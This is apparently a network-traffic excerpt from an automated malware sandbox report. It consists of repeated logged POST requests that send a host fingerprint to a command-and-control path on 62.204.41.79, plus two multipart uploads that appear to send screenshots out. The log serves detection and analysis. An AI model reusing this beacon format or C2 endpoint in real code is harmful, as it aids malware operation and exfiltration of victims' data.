Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
